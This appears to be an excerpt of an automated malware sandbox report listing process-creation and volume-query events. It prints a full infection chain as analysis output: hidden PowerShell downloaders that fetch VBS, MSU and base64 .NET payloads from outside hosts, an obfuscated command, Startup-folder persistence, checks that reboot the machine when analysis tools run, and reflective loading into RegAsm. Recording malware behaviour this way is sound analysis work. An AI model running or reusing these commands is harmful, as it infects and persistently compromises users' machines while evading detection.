Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ycena; $tdiln = (new-object net.webclient);$tdiln.encoding = [system.text.encoding]::utf8;$ycena = $tdiln.downloadstring( 'https://teldrum.ro//images/globalx1.vbs' );$dyosy = [system.io.path]::gettemppath() + '\x.vbs';$ycena \| out-file -filepath $dyosy; wscript.exe //nologo $dyosy"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $hzjmp = 'ow' + [char]66 + '9adsaia' + [char]66 + 'pafqaqw' + [char]66 + '2afgajaagaguaba' + [char]66 + 'paeyalqagahmacw' + [char]66 + 'hahaaeq' + [char]66 + 'cacaaeq' + [char]66 + 'jagkaba' + [char]66 + 'vafaabg' + [char]66 + 'vagkada' + [char]66 + '1agmazq' + [char]66 + '4aeualqagagwaba' + [char]66 + 'laggacw' + [char]66 + 'yaguadw' + [char]66 + 'vahaaowagaguayw' + [char]66 + 'yag8azgatacaaia' + [char]66 + 'pafqaqw' + [char]66 + '2afgajaagaggada' + [char]66 + 'hafaazq' + [char]66 + 'sagkargatacaazq' + [char]66 + 'sagkargatahqadq' + [char]66 + 'pacaafaagae8abq' + [char]66 + 'tagyaugakadsaiaapacaajwaxahmacaauadmama' + [char]66 + 'sagwazaanacaakwagackaka' + [char]66 + 'oahqayq' + [char]66 + 'qahaabq' + [char]66 + 'lafqada' + [char]66 + 'laecaoga6af0aaa' + [char]66 + '0ageauaauae8asqauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsaiaaoacaapqagagkava' + [char]66 + 'dahyawaakadsaiaanadsakqagackaiaanaccabq' + [char]66 + 'zageazw' + [char]66 + 'lahiaxaa5adeamwawadmalgawac4ana' + [char]66 + '2afwaaw' + [char]66 + 'yag8adw' + [char]66 + 'lag0ayq' + [char]66 + 'yagyaxa' + [char]66 + '0aguabgauahqazg' + [char]66 + 'vahmabw' + [char]66 + 'yagmaaq' + [char]66 + 'tafwacw' + [char]66 + '3ag8aza' + [char]66 + 'uagkadw' + [char]66 + 'cadoayw' + [char]66 + 'eaeqaia' + [char]66 + 'eaccajwagacwaiaanaccajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanaccaiaasacaajwanaggada' + [char]66 + '0ahaacwa6ac8alw' + [char]66 + '0aguaba' + [char]66 + 'kahiadq' + [char]66 + 'tac4acg' + [char]66 + 'vac8alw' + [char]66 + 'pag0ayq' + [char]66 + 'naguacwavagcaba' + [char]66 + 'vagiayq' + [char]66 + 'sahgamqauagoaca' + [char]66 + 'naccajwagacgaia' + [char]66 + 'daf0aww' + [char]66 + '0agmazq' + [char]66 + 'qagiabw' + [char]66 + 'bacaalaagagwaba' + [char]66 + '1ag4ajaagacgazq' + [char]66 + 'rag8adg' + [char]66 + 'uaekalgapacaajwanaekavg' + [char]66 + 'gahiacaanaccaiaaoagqabw' + [char]66 + 'oahqazqanacaapqaracaatw' + [char]66 + 'tag0azg' + [char]66 + 'sacqaowagaccatq' + [char]66 + '0aguarwauackaiaanaccamq' + [char]66 + 'zahmayq' + [char]66 + 'saemalgazahkacg' + [char]66 + 'hahiayg' + [char]66 + 'paewacw' + [char]66 + 'zageaba' + [char]66 + 'daccajwagacgazq' + [char]66 + 'wahkava' + [char]66 + '0aguarwanacaapqaracaatw' + [char]66 + 'tag0azg' + [char]66 + 'sacqaowagaccalgapacaacg' + [char]66 + 'gagqawq' + [char]66 + 'sacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoajwagacsaiaanadoaxq' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + 'wahaaqqauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsajwagad0akwagae8abq' + [char]66 + 'tagyaugakadsaiaanadsaiaapacaakqanaccaqqanaccalaanaccakye6ajmhjwanacgazq' + [char]66 + 'jageaba' + [char]66 + 'waguacgauaecazq' + [char]66 + 'hahkacgakacaaka' + [char]66 + 'nag4aaq' + [char]66 + 'yahqauwa0adyazq' + [char]66 + '
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $ltkzz = $host.version.major.equals(2) ;if ( $ltkzz ) {$fbkny = ( [system.io.path]::gettemppath() );del ( $fbkny + '\upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$ehgvw = $env:processor_architecture.contains('64') ;if ( $ehgvw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (new-object net.webclient);$dmpdz.encoding = [system.text.encoding]::utf8;$dmpdz.downloadfile( $kwxxg, ($fbkny + '\upwin.msu') );$gawcw = ( 'c:\users\' + [environment]::username );$glaoe = ($fbkny + '\upwin.msu'); powershell.exe wusa.exe $glaoe /quiet /norestart ; copy-item 'c:\users\user\appdata\local\temp\x.vbs' -destination ( $gawcw + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit; };[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;$stringbase;function basemy{;$rydfr = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($stringbase));return $rydfr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cznqf = ( [system.io.path]::gettemppath() + 'dll01.txt' );$webclient = new-object system.net.webclient ;$fawul = $webclient.downloadstring( $lthpd ) ;$stringbase = $fawul; $fawul = basemy;$fawul \| out-file -filepath $cznqf -encoding 'utf8' -force ;$jqcvn = ( [system.io.path]::gettemppath() + 'dll02.txt' ) ;$cqign = new-object system.net.webclient ;$cqign.encoding = [system.text.encoding]::utf8 ;$nfuqg = ( get-content -path $cznqf ) ;$ziumm = $cqign.downloaddata( $nfuqg ) ;$tmrhf = [system.text.encoding]::utf8.getstring($ziumm);$tmrhf \| out-file -filepath $jqcvn -force ;$rfmmo = '$tfyio = ( [system.io.path]::gettemppath() + ''dll02.txt'' ) ; $ryaeg = (get-content -path $tfyio -encoding utf8);' ;$rfmmo += '[byte[]] $rydfr = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$rfmmo += '[system.appdomain]:' + ':currentdomain.load( $rydfr ).' ;$rfmmo += 'gettype( ''classlibrary3.class1'' ).getm' ;$rfmmo += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''c:\users\user\appdata\local\temp\x.vbs'' , ''d ddc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$xvcti = ( [system.io.path]::gettemppath() + 'dll03.ps1' ) ;$rfmmo \| out-file -filepath $xvcti -force ;powershell -executionpolicy bypass -file $xvcti ;};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nicme.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nicme.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nzans.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nicme.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nzans.ps1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qndib.ps1' ";exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qndib.ps1' ";exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qndib.ps1' ";exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ycena; $tdiln = (new-object net.webclient);$tdiln.encoding = [system.text.encoding]::utf8;$ycena = $tdiln.downloadstring( 'https://teldrum.ro//images/globalx1.vbs' );$dyosy = [system.io.path]::gettemppath() + '\x.vbs';$ycena \| out-file -filepath $dyosy; wscript.exe //nologo $dyosy"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $hzjmp = 'ow' + [char]66 + '9adsaia' + [char]66 + 'pafqaqw' + [char]66 + '2afgajaagaguaba' + [char]66 + 'paeyalqagahmacw' + [char]66 + 'hahaaeq' + [char]66 + 'cacaaeq' + [char]66 + 'jagkaba' + [char]66 + 'vafaabg' + [char]66 + 'vagkada' + [char]66 + '1agmazq' + [char]66 + '4aeualqagagwaba' + [char]66 + 'laggacw' + [char]66 + 'yaguadw' + [char]66 + 'vahaaowagaguayw' + [char]66 + 'yag8azgatacaaia' + [char]66 + 'pafqaqw' + [char]66 + '2afgajaagaggada' + [char]66 + 'hafaazq' + [char]66 + 'sagkargatacaazq' + [char]66 + 'sagkargatahqadq' + [char]66 + 'pacaafaagae8abq' + [char]66 + 'tagyaugakadsaiaapacaajwaxahmacaauadmama' + [char]66 + 'sagwazaanacaakwagackaka' + [char]66 + 'oahqayq' + [char]66 + 'qahaabq' + [char]66 + 'lafqada' + [char]66 + 'laecaoga6af0aaa' + [char]66 + '0ageauaauae8asqauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsaiaaoacaapqagagkava' + [char]66 + 'dahyawaakadsaiaanadsakqagackaiaanaccabq' + [char]66 + 'zageazw' + [char]66 + 'lahiaxaa5adeamwawadmalgawac4ana' + [char]66 + '2afwaaw' + [char]66 + 'yag8adw' + [char]66 + 'lag0ayq' + [char]66 + 'yagyaxa' + [char]66 + '0aguabgauahqazg' + [char]66 + 'vahmabw' + [char]66 + 'yagmaaq' + [char]66 + 'tafwacw' + [char]66 + '3ag8aza' + [char]66 + 'uagkadw' + [char]66 + 'cadoayw' + [char]66 + 'eaeqaia' + [char]66 + 'eaccajwagacwaiaanaccajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanaccaiaasacaajwanaggada' + [char]66 + '0ahaacwa6ac8alw' + [char]66 + '0aguaba' + [char]66 + 'kahiadq' + [char]66 + 'tac4acg' + [char]66 + 'vac8alw' + [char]66 + 'pag0ayq' + [char]66 + 'naguacwavagcaba' + [char]66 + 'vagiayq' + [char]66 + 'sahgamqauagoaca' + [char]66 + 'naccajwagacgaia' + [char]66 + 'daf0aww' + [char]66 + '0agmazq' + [char]66 + 'qagiabw' + [char]66 + 'bacaalaagagwaba' + [char]66 + '1ag4ajaagacgazq' + [char]66 + 'rag8adg' + [char]66 + 'uaekalgapacaajwanaekavg' + [char]66 + 'gahiacaanaccaiaaoagqabw' + [char]66 + 'oahqazqanacaapqaracaatw' + [char]66 + 'tag0azg' + [char]66 + 'sacqaowagaccatq' + [char]66 + '0aguarwauackaiaanaccamq' + [char]66 + 'zahmayq' + [char]66 + 'saemalgazahkacg' + [char]66 + 'hahiayg' + [char]66 + 'paewacw' + [char]66 + 'zageaba' + [char]66 + 'daccajwagacgazq' + [char]66 + 'wahkava' + [char]66 + '0aguarwanacaapqaracaatw' + [char]66 + 'tag0azg' + [char]66 + 'sacqaowagaccalgapacaacg' + [char]66 + 'gagqawq' + [char]66 + 'sacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoajwagacsaiaanadoaxq' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + 'wahaaqqauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsajwagad0akwagae8abq' + [char]66 + 'tagyaugakadsaiaanadsaiaapacaakqanaccaqqanaccalaanaccakye6ajmhjwanacgazq' + [char]66 + 'jageaba' + [char]66 + 'waguacgauaecazq' + [char]66 + 'hahkacgakacaaka' + [char]66 + 'nag4aaq' + [char]66 + 'yahqauwa0adyazq' + [char]66 + '	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $ltkzz = $host.version.major.equals(2) ;if ( $ltkzz ) {$fbkny = ( [system.io.path]::gettemppath() );del ( $fbkny + '\upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$ehgvw = $env:processor_architecture.contains('64') ;if ( $ehgvw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (new-object net.webclient);$dmpdz.encoding = [system.text.encoding]::utf8;$dmpdz.downloadfile( $kwxxg, ($fbkny + '\upwin.msu') );$gawcw = ( 'c:\users\' + [environment]::username );$glaoe = ($fbkny + '\upwin.msu'); powershell.exe wusa.exe $glaoe /quiet /norestart ; copy-item 'c:\users\user\appdata\local\temp\x.vbs' -destination ( $gawcw + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit; };[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;$stringbase;function basemy{;$rydfr = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($stringbase));return $rydfr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cznqf = ( [system.io.path]::gettemppath() + 'dll01.txt' );$webclient = new-object system.net.webclient ;$fawul = $webclient.downloadstring( $lthpd ) ;$stringbase = $fawul; $fawul = basemy;$fawul \| out-file -filepath $cznqf -encoding 'utf8' -force ;$jqcvn = ( [system.io.path]::gettemppath() + 'dll02.txt' ) ;$cqign = new-object system.net.webclient ;$cqign.encoding = [system.text.encoding]::utf8 ;$nfuqg = ( get-content -path $cznqf ) ;$ziumm = $cqign.downloaddata( $nfuqg ) ;$tmrhf = [system.text.encoding]::utf8.getstring($ziumm);$tmrhf \| out-file -filepath $jqcvn -force ;$rfmmo = '$tfyio = ( [system.io.path]::gettemppath() + ''dll02.txt'' ) ; $ryaeg = (get-content -path $tfyio -encoding utf8);' ;$rfmmo += '[byte[]] $rydfr = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$rfmmo += '[system.appdomain]:' + ':currentdomain.load( $rydfr ).' ;$rfmmo += 'gettype( ''classlibrary3.class1'' ).getm' ;$rfmmo += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''c:\users\user\appdata\local\temp\x.vbs'' , ''d ddc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$xvcti = ( [system.io.path]::gettemppath() + 'dll03.ps1' ) ;$rfmmo \| out-file -filepath $xvcti -force ;powershell -executionpolicy bypass -file $xvcti ;};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nicme.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nzans.ps1'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nicme.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nicme.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\nzans.ps1"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
